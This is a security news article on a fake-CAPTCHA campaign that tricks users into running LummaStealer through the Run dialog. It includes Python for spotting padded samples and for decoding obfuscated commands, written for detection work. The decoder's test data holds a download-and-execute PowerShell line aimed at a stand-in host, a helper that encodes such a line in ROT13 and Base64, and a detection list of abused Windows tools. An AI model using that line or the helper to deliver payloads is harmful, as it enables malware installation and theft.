Beware! Fake CAPTCHA Scam That Silently Installs LummaStealer

Cybersecurity researchers at G DATA have uncovered a new malicious campaign leveraging fake booking websites to distribute the LummaStealer malware.

This sophisticated attack, discovered in early 2025, employs a fake CAPTCHA verification process to trick users into executing malicious commands on their systems.

The infection chain begins when victims visit a fraudulent payment confirmation URL, which redirects them to a fake booking itinerary page.

This page presents a deceptive CAPTCHA prompt that instructs the user to open the Windows Run dialog (Win+R) and execute a command.

That single action launches a series of obfuscated scripts that download and run the LummaStealer payload. No exploit is involved: the victim supplies the execution, which is what makes the lure effective against fully patched systems.

Figure: Obfuscated PHP code

LummaStealer Evolves with New Tactics

LummaStealer, an information-stealing malware operating under a Malware-as-a-Service (MaaS) model, has expanded its distribution methods.

Previously spread through platforms like GitHub and Telegram, it now employs malvertising techniques on fake booking websites.

The campaign has shown a global reach, with observed targets in countries such as the Philippines and Germany.

The malware samples involved in this attack are significantly larger than previous versions, growing by up to 350% (from roughly 2 MB to 9 MB).

This inflation is most likely binary padding: filling the file with junk so that it exceeds the size limits many antivirus engines and sandboxes apply before they scan or submit a file.

The enlarged payloads are disguised as legitimate installers, further complicating detection efforts.
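To tell a padded sample from an installer that is merely big, a first check is how much of the file is filler. The Python below is an added example, not G DATA's tooling and not code from the campaign: it scores a file by the fraction of near-zero-entropy chunks and by its longest single-byte run. The bytes it analyses are constructed inline with the same 1:3.5 growth ratio as the 2 MB to 9 MB figures above, and the thresholds (4 KiB chunks, 1.0 bit/byte, 50% filler) are assumptions to tune against a corpus of clean installers before using the verdict for alerting.

```python
"""Measure how much of a sample is filler: the check that separates a genuinely
large installer from a padded stealer. Added example; the bytes analysed below
are constructed here, not taken from a LummaStealer sample."""
import math
import random
import re
from collections import Counter


def chunk_entropy(chunk: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a run of one value, close to
    8.0 for compressed or encrypted data."""
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def longest_run(data: bytes):
    """Longest run of one byte value as (value, length, offset); (None, 0, 0)
    for empty input. Padding usually shows up as one huge run of 0x00."""
    best = max(re.finditer(rb"(.)\1*", data, re.DOTALL),
               key=lambda m: m.end() - m.start(), default=None)
    if best is None:
        return (None, 0, 0)
    return (best.group(1)[0], best.end() - best.start(), best.start())


def padding_report(data: bytes, chunk_size: int = 4096, low_entropy: float = 1.0) -> dict:
    """Fraction of low-entropy chunks, the longest single-byte run, and the size
    the file would have with that run removed."""
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    low = sum(1 for c in chunks if chunk_entropy(c) < low_entropy)
    value, length, offset = longest_run(data)
    return {
        "size": len(data),
        "low_entropy_fraction": round(low / len(chunks), 3) if chunks else 0.0,
        "longest_run": {"byte": value, "length": length, "offset": offset},
        "size_without_run": len(data) - length,
    }


def looks_padded(report: dict, min_fraction: float = 0.5) -> bool:
    """Heuristic verdict: at least min_fraction of the file is near-zero-entropy
    filler. Tune the threshold against a clean-installer corpus first."""
    return report["low_entropy_fraction"] >= min_fraction


def build_sample(real_size: int = 128 * 1024, pad_size: int = 448 * 1024,
                 pad_byte: int = 0) -> bytes:
    """Constructed stand-in for a padded installer: pseudo-random 'code'
    followed by a block of filler (same 1:3.5 ratio as the 2 MB to 9 MB growth)."""
    rng = random.Random(2025)
    return rng.randbytes(real_size) + bytes([pad_byte]) * pad_size


if __name__ == "__main__":
    rep = padding_report(build_sample())
    print(rep, "padded" if looks_padded(rep) else "not padded")
```

The size_without_run value is useful on its own: hashing only the non-filler prefix lets you correlate a padded sample with the unpadded build of the same stealer, which a hash of the whole file will never match.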

Advanced Evasion Techniques

LummaStealer continues to use sophisticated obfuscation methods, including Indirect Control Flow.

In this technique, dispatcher blocks compute the address of the next code block at runtime instead of branching to it directly, so a static disassembler cannot recover the control-flow graph and analysts are forced to trace execution dynamically.

The attack chain wraps its commands in multiple stages of obfuscation and encryption, including ROT13 and Base64 encoding. Those two are encodings rather than encryption: they keep the download-and-execute command from being readable at a glance, but each layer is trivially reversible once spotted.

Figure: Infection chain flow

These layers of complexity serve to conceal the malicious nature of the scripts and commands from both users and security software.
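As an added example covering two of the passages above, the Run-dialog step in the infection chain and the ROT13/Base64 layering, here is a small Python triage script; it is not code from the G DATA write-up or from the campaign. It peels Base64 and ROT13 layers in whichever order they were applied, also handles the UTF-16LE Base64 that PowerShell's -EncodedCommand takes, and flags entries in Explorer's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where Windows records what a user typed into the Run dialog. The inner script, the layer order, the LOLBin list and the sample RunMRU values are all constructed assumptions for the example, not the campaign's actual commands.

```python
"""Peel ROT13/Base64 layers off a ClickFix-style Run-dialog command and flag
suspicious RunMRU entries. Added example: the layer order, inner script and
RunMRU values are constructed assumptions, not what G DATA observed."""
import base64
import binascii
import codecs
import re

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
LOLBINS = {"powershell", "pwsh", "mshta", "cmd", "wscript", "cscript", "curl",
           "certutil", "bitsadmin", "rundll32", "regsvr32", "msiexec"}
SCRIPT_MARKERS = re.compile(
    r"\b(iex|invoke-expression|invoke-webrequest|downloadstring|downloadfile|"
    r"frombase64string|new-object|start-process|webclient)\b|https?://", re.I)

def looks_like_script(text: str) -> bool:
    return SCRIPT_MARKERS.search(text) is not None

def _as_text(raw: bytes):
    """Text if raw is mostly printable ASCII as UTF-8 or as UTF-16LE (the
    encoding PowerShell -EncodedCommand uses); None for binary garbage."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            s = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if s and sum(32 <= ord(c) < 127 or c in "\r\n\t" for c in s) >= 0.9 * len(s):
            return s
    return None

def _decode_base64(text: str):
    """Base64-decode text only when the result is a useful next layer: script,
    ROT13 of script, or another Base64 blob (ROT13 keeps the Base64 alphabet)."""
    s = text.strip()
    if not B64_TOKEN.fullmatch(s):
        return None
    try:
        plain = _as_text(base64.b64decode(s, validate=True))
    except (binascii.Error, ValueError):
        return None
    if plain and (looks_like_script(plain) or looks_like_script(codecs.decode(plain, "rot_13"))
                  or B64_TOKEN.fullmatch(plain.strip())):
        return plain
    return None

def obfuscate(script: str, order=("rot13", "base64")) -> str:
    """Attacker-side helper: apply the named layers in order. Builds the sample
    below and lets the decoder be exercised against every layer order."""
    for layer in order:
        if layer == "rot13":
            script = codecs.encode(script, "rot_13")
        elif layer == "base64":
            script = base64.b64encode(script.encode()).decode()
        elif layer == "b64utf16":  # what PowerShell -EncodedCommand expects
            script = base64.b64encode(script.encode("utf-16-le")).decode()
    return script

def peel_layers(token: str, max_layers: int = 6):
    """Strip Base64 and ROT13 layers in whatever order they were applied, until
    the text reads like a download-and-execute script. Returns (layers, text)."""
    layers, current = [], token
    for _ in range(max_layers):
        if looks_like_script(current):
            break
        plain = _decode_base64(current)
        if plain is not None:
            layers.append("base64")
            current = plain
            continue
        rot = codecs.decode(current, "rot_13")
        if looks_like_script(rot) or _decode_base64(rot) is not None:
            layers.append("rot13")
            current = rot
            continue
        break
    return layers, current

def triage_runmru(entries: dict) -> list:
    """Flag Explorer RunMRU values (Explorer stores each as 'command\\1') that
    start with a LOLBin and carry a blob the decoder can peel."""
    findings = []
    for name, value in entries.items():
        words = value.removesuffix("\\1").strip().strip('"').split()
        head = words[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe") if words else ""
        if head not in LOLBINS:
            continue
        for blob in B64_TOKEN.findall(value):
            layers, plain = peel_layers(blob)
            if layers or looks_like_script(plain):
                findings.append({"entry": name, "binary": head,
                                 "layers": layers, "decoded": plain})
    return findings

# Constructed sample: inner script -> ROT13 -> Base64, then pasted into Win+R.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.txt')"
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "cmd /c ipconfig /all\\1",
    "c": f'powershell -w hidden -NoProfile -Command "{obfuscate(INNER)}"\\1',
}
```

On a live host, the values to feed triage_runmru come from `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`; the same decoder applies to the command line of any powershell.exe or mshta.exe child of explorer.exe in process-creation telemetry. A Base64 layer is only accepted when what it decodes to advances the chain (script, ROT13 of script, or another blob), which keeps random-looking data from being peeled into nonsense.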

According to the researchers, this new campaign represents a significant evolution in LummaStealer’s tactics, drawing parallels with the infamous Emotet banking trojan.

The use of ClickFix social engineering techniques, combined with the malware’s expanding attack vectors, suggests that LummaStealer may continue to pose a substantial threat in the coming months.

Users are advised to exercise caution when interacting with booking confirmation emails or websites, especially those requiring unusual verification steps. No legitimate CAPTCHA asks the user to open the Run dialog or paste a command; any such instruction should be treated as malicious.

Security professionals should remain vigilant and continue to monitor for new iterations of this evolving threat, watching in particular for the signature of this chain: a user-initiated Run-dialog command that launches a scripting host such as PowerShell or mshta.

As the cybersecurity landscape continues to evolve, both individuals and organizations need to stay informed about the latest threats and maintain robust security practices to protect against attacks like the LummaStealer campaign.
